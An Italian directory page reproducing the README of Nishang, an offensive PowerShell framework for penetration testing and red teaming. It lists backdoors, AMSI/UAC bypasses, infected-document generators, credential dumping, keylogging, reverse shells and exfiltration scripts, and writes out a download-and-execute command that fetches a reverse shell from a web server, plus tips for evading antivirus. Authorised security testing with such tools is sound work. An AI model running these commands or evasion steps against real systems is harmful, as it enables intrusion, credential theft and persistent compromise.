Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
nishang — Nishang - PowerShell offensivo per red team, penetration testing e sicurezza offensiva. | Kitploit
Strumenti/GitHubGitHub/samratashok/nishang
Password CrackingStrumenti di PhishingEscalation di PrivilegiGenerazione di PayloadExploitMovimento LateraleEsfiltrazione DatiRaccolta InformazioniPost-ExploitPenetration TestingCommand and ControlRed Teaming
10.0k2.5k3 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubsamratashok/nishang

nishang

Nishang - PowerShell offensivo per red team, penetration testing e sicurezza offensiva.

Vedi Repository

Nishang

Nishang è un framework e una raccolta di script e payload che consente l'uso di PowerShell per la sicurezza offensiva, i penetration test e il red teaming. Nishang è utile durante tutte le fasi del penetration testing.

Di Nikhil Mittal Fondatore di Altered Security - Formazione pratica su red team e sicurezza aziendale!

Utilizzo

Importa tutti gli script nella sessione PowerShell corrente (PowerShell v3 in poi).

root@kitploit:~
PS C:\nishang> Import-Module .\nishang.psm1

Usa i singoli script con il dot sourcing.

root@kitploit:~
PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

PS C:\nishang> Get-Information

Per ottenere aiuto su qualsiasi script o funzione, usa:

root@kitploit:~
PS C:\nishang> Get-Help [nome script] -full

Nota che l'aiuto è disponibile per la funzione caricata dopo l'esecuzione dello script e non per lo script stesso dalla versione 0.3.8. In tutti i casi, il nome della funzione è lo stesso del nome dello script.

Ad esempio, per vedere l'aiuto su Get-WLAN-Keys.ps1, usa

root@kitploit:~
PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

PS C:\nishang> Get-Help Get-WLAN-Keys -Full

Antivirus

Gli script di Nishang vengono segnalati come dannosi da molti antivirus. Gli script su un target sono pensati per essere utilizzati in memoria, operazione molto semplice con PowerShell. Due metodi base per eseguire script PowerShell in memoria:

Metodo 1. Usa il download ed esecuzione in memoria: Utilizza il comando seguente per eseguire uno script PowerShell da una shell remota, una shell nativa di meterpreter, una web shell, ecc. e la funzione da esso esportata. Tutti gli script in Nishang esportano una funzione con lo stesso nome nella sessione PowerShell corrente.

root@kitploit:~
powershell iex (New-Object Net.WebClient).DownloadString('http://<tuowebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

Metodo 2. Usa il parametro -encodedcommand (o -e) di PowerShell Tutti gli script in Nishang esportano una funzione con lo stesso nome nella sessione PowerShell corrente. Pertanto, assicurati che la chiamata alla funzione sia fatta nello script stesso quando si utilizza il parametro encodedcommand da una shell non PowerShell. Per l'esempio sopra, aggiungi una chiamata di funzione (senza virgolette) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]".

Codifica lo script usando Invoke-Encode di Nishang:

root@kitploit:~
PS C:\nishang> . \nishang\Utility\Invoke-Encode

PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand

Dati codificati scritti in .\encoded.txt

Comando codificato scritto in .\encodedcommand.txt

Da sopra, usa lo script codificato da encodedcommand.txt ed eseguilo su un target dove i comandi possono essere eseguiti (una shell remota, shell nativa di meterpreter, una web shell, ecc.). Usalo come segue:

root@kitploit:~
C:\Users\target> powershell -e [scriptcodificato]

Se gli script vengono ancora rilevati, cambiare i nomi delle funzioni e dei parametri e rimuovere il contenuto di aiuto aiuterà.

Nel caso in cui AMSI di Windows 10 blocchi ancora l'esecuzione dello script, consulta questo blog: http://www.labofapenetrationtester.com/2016/09/amsi.html

Script

Nishang attualmente contiene i seguenti script e payload.

ActiveDirectory

Set-DCShadowPermissions

Modifica gli oggetti AD per fornire i permessi minimi necessari per DCShadow.

Antak - la Webshell

Antak

Esegui script PowerShell in memoria, esegui comandi e scarica e carica file usando questa webshell.

Backdoor

HTTP-Backdoor

Una backdoor che può ricevere istruzioni da siti web di terze parti ed eseguire script PowerShell in memoria.

DNS_TXT_Pwnage

Una backdoor che può ricevere comandi e script PowerShell da query DNS TXT, eseguirli su un target ed essere controllata a distanza tramite le query.

Execute-OnTime

Una backdoor che può eseguire script PowerShell in un determinato momento su un target.

Gupt-Backdoor

Una backdoor che può ricevere comandi e script da un SSID WLAN senza connettersi ad esso.

Add-ScrnSaveBackdoor

Una backdoor che può utilizzare lo screensaver di Windows per l'esecuzione remota di comandi e script.

Invoke-ADSBackdoor

Una backdoor che può utilizzare flussi di dati alternativi e il Registro di Windows per ottenere persistenza.

Add-RegBackdoor

Una backdoor che utilizza il noto trucco del Debugger per eseguire payload con Sticky keys e Utilman (Windows key + U).

Set-RemoteWMI

Modifica i permessi di DCOM e dei namespace WMI per consentire l'accesso a un utente non amministratore.

Set-RemotePSRemoting

Modifica i permessi del PowerShell remoting per consentire l'accesso a un utente non amministratore.

Bypass

Invoke-AmsiBypass

Implementazione di metodi pubblicamente noti per bypassare/evitare AMSI.

Client

Out-CHM

Crea file CHM infetti in grado di eseguire comandi e script PowerShell.

Out-Word

Crea file Word e infetta quelli esistenti per eseguire comandi e script PowerShell.

Out-Excel

Crea file Excel e infetta quelli esistenti per eseguire comandi e script PowerShell.

Out-HTA

Crea un file HTA che può essere distribuito su un server web e utilizzato in campagne di phishing.

Out-Java

Crea file JAR firmati che possono essere utilizzati con applet per l'esecuzione di script e comandi.

Out-Shortcut

Crea file di collegamento in grado di eseguire comandi e script PowerShell.

Out-WebQuery

Crea file IQY per il phishing di credenziali e hash SMB.

Out-JS

Crea file JS in grado di eseguire comandi e script PowerShell.

Out-SCT

Crea file SCT in grado di eseguire comandi e script PowerShell.

Out-SCF

Crea un file SCF che può essere utilizzato per catturare le sfide NTLM hash.

Escalation

Enable-DuplicateToken

Quando sono necessari privilegi SYSTEM.

Remove-Update

Introduci vulnerabilità rimuovendo le patch.

Invoke-PsUACme

Bypassa UAC.

Execution

Download-Execute-PS

Scarica ed esegui uno script PowerShell in memoria.

Download_Execute

Scarica un eseguibile in formato testo, convertilo in un eseguibile ed eseguilo.

Execute-Command-MSSQL

Esegui comandi PowerShell, comandi nativi o comandi SQL su un server MSSQL con privilegi sufficienti.

Execute-DNSTXT-Code

Esegui shellcode in memoria utilizzando query DNS TXT.

Out-RundllCommand

Esegui comandi e script PowerShell o una sessione PowerShell inversa tramite rundll32.exe.

Gather

Check-VM

Verifica la presenza di una macchina virtuale.

Copy-VSS

Copia il file SAM utilizzando il servizio Volume Shadow Copy.

Invoke-CredentialsPhish

Inganna un utente per fargli fornire credenziali in chiaro.

FireBuster FireListener

Una coppia di script per il test di egress

Get-Information

Ottieni informazioni succose da un target.

Get-LSASecret

Ottieni LSA Secret da un target.

Get-PassHashes

Ottieni gli hash delle password da un target.

Get-WLAN-Keys

Ottieni le chiavi WLAN in chiaro da un target.

Keylogger

Registra le sequenze di tasti da un target.

Invoke-MimikatzWdigestDowngrade

Estrai le password degli utenti in chiaro su Windows 8.1 e Server 2012

Get-PassHints

Ottieni i suggerimenti per le password degli utenti Windows da un target.

Show-TargetScreen

Collegati e trasmetti lo schermo del target utilizzando MJPEG.

Invoke-Mimikatz

Carica mimikatz in memoria. Aggiornato e con alcune personalizzazioni.

Invoke-Mimikittenz

Estrai informazioni succose dalla memoria dei processi del target (come i browser) utilizzando regex.

Invoke-SSIDExfil

Esfiltra informazioni come le credenziali degli utenti, utilizzando WLAN SSID.

Invoke-SessionGopher

Identifica i jump-box amministrativi e/o i computer utilizzati per accedere a macchine Unix.

MITM

Invoke-Interceptor

Un proxy HTTPS locale per attacchi MITM.

Pivot

Create-MultipleSessions

Verifica le credenziali su più computer e crea PSSession.

Run-EXEonRemote Copia ed esegui un eseguibile su più macchine.

Invoke-NetworkRelay Crea relay di rete tra computer.

Prasadhak

Prasadhak

Verifica gli hash dei processi in esecuzione rispetto al database VirusTotal.

Scan

Brute-Force

Brute force su FTP, Active Directory, MSSQL e Sharepoint.

Port-Scan

Uno scanner di porte utile.

Powerpreter

Powerpreter

Tutta la funzionalità di nishang in un singolo modulo script.

Shells

Invoke-PsGcat

Invia comandi e script a un account Gmail specificato per essere eseguiti da Invoke-PsGcatAgent

Invoke-PsGcatAgent

Esegue comandi e script inviati da Invoke-PsGcat.

Invoke-PowerShellTcp

Una shell inversa interattiva o bind di PowerShell

Invoke-PowerShellTcpOneLine

Versione ridotta di Invoke-PowerShellTcp. Contiene anche una versione scheletro che può stare in due tweet.

Invoke-PowerShellTcpOneLineBind

Versione bind di Invoke-PowerShellTcpOneLine.

Invoke-PowerShellUdp

Una shell inversa interattiva o bind di PowerShell tramite UDP

Invoke-PowerShellUdpOneLine

Versione ridotta di Invoke-PowerShellUdp.

Invoke-PoshRatHttps

PowerShell inverso interattivo su HTTPS.

Invoke-PoshRatHttp

PowerShell inverso interattivo su HTTP.

Remove-PoshRat

Pulisci il sistema dopo aver usato Invoke-PoshRatHttps

Invoke-PowerShellWmi

PowerShell interattivo utilizzando WMI.

Invoke-PowerShellIcmp

Una shell inversa interattiva di PowerShell tramite ICMP.

Invoke-JSRatRundll

Una shell inversa interattiva di PowerShell tramite HTTP usando rundll32.exe.

Invoke-JSRatRegsvr

Una shell inversa interattiva di PowerShell tramite HTTP usando regsvr32.exe.

Utility

Add-Exfiltration

Aggiungi la capacità di esfiltrazione dati a Gmail, Pastebin, un server web e DNS a qualsiasi script.

Add-Persistence

Aggiungi la capacità di persistenza al riavvio a uno script.

Remove-Persistence

Rimuovi la persistenza aggiunta dallo script Add-Persistence.

Do-Exfiltration

Usa pipe (|) questo con qualsiasi script per esfiltrare l'output.

Download

Trasferisci un file al target.

Parse_Keys

Analizza i tasti registrati dal keylogger.

Invoke-Encode

Codifica e comprimi uno script o una stringa.

Invoke-Decode

Decodifica e decomprimi uno script o una stringa da Invoke-Encode.

Start-CaptureServer

Esegui un server web che registra l'autenticazione di base e gli hash SMB.

ConvertTo-ROT13

Codifica una stringa in ROT13 o decodifica una stringa ROT13.

Out-DnsTxt

Genera record DNS TXT che possono essere utilizzati con altri script.

[Base64ToString]

[StringToBase64]

[ExetoText]

[TexttoExe]

Aggiornamenti

Gli aggiornamenti su Nishang possono essere trovati sul mio blog http://labofapenetrationtester.com e sul mio feed Twitter @nikhil_mitt.

Bug, Feedback e Richieste di Funzionalità

Per favore apri una segnalazione se incontri un bug o hai una richiesta di funzionalità. Puoi inviarmi un'email a nikhil [dot] uitrgpv at gmail.com

Mailing List

Per feedback, discussioni e richieste di funzionalità, unisciti a: http://groups.google.com/group/nishang-users

Contribuire

Sono sempre alla ricerca di contributori per Nishang. Per favore invia richieste o inviami un'email.

Post del Blog

Alcuni post del blog utili per i principianti:

http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html

http://labofapenetrationtester.com/2012/08/introducing-nishang-powereshell-for.html

http://labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html

http://www.labofapenetrationtester.com/2013/09/powerpreter-and-nishang-Part-2.html

Tutti i post su Nishang:

http://www.labofapenetrationtester.com/search/label/Nishang

Scarica lo strumento